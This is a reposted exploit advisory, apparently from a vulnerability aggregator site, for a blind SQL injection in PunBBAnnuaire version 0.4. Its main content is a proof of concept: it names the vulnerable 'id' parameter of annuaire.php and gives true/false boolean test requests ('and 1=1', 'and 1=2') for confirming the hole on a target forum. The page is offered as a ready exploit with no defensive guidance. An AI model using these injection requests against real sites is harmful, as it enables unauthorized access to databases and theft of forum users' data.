PunBBAnnuaire 0.4 blind SQL injection vulnerability

Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010020102

Below is a copy:

PunBBAnnuaire <=0.4 Blind SQL Injection Vulnerability
========================================================

#######
.:. Author : Metropolis
.:. Home : http://xrayoptics.by.ru/
.:. Script : PunBBAnnuaire
.:. Version : 0.4
.:. Download Script: http://www.punres.org/download.php?id=1737
.:. Bug Type : Blind Sql Injection

#######

===[ Exploit ]===

/annuaire.php?action=site&id=1[ Blind SQL INJECTION ]

www.site.com/forum/annuaire.php?action=site&id=1 and 1=1 <-- true
www.site.com/forum/annuaire.php?action=site&id=1 and 1=2 <-- false

##

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.